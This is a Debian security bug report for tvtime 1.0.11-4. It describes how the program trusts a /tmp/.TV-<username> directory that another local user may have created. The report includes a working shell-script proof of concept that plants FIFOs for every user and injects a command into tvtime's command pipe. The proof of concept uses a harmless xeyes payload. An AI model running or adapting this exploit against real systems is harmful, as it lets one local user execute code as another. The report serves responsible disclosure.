Bug#924076: tvtime: insecure use of /tmp
Package: tvtime
Version: 1.0.11-4
Severity: grave
Tags: security
tvtime uses /tmp/.TV-<username>/ as a temporary directory, even when it
belongs to another (potentially malicious) user. Local attacker can
exploit this bug to execute arbitrary code in the context of a tvtime
user.
I've attached a proof-of-concept exploit.
--
Jakub Wilk
#!/bin/sh
set -e -u
if ! command -v xeyes > /dev/null
then
printf 'xeyes(1) not found. Please install x11-apps.\n' >&2
exit 1
fi
cd /tmp
basedir=$(mktemp -d tvtime-exploit.XXXXXX)
chmod 755 "$basedir"
mkfifo -m 644 "$basedir/cmd"
mkfifo -m 666 "$basedir/ratelim"
hostname=$(hostname)
users=$(getent passwd | cut -d: -f1)
for user in $users
do
userdir=".TV-$user"
rm -rf "$userdir" || true # maybe stale dir from the previous exploit run?
if ! mkdir -m 755 "$userdir"
then
printf 'Failed to mount the exploit against %s; Maybe try again after reboot?\n' "$user"
continue
fi
ln "$basedir/cmd" "$userdir/tvtimefifo-$hostname"
done
while true
do
printf 'Waiting for the victim to run tvtime...' "$0" >&2
printf 'RUN_COMMAND xeyes && echo x > /tmp/%s; true\n' "$basedir/ratelim" > "$basedir/cmd"
printf '\n' >&2
read x < "$basedir/ratelim"
done
Reply to: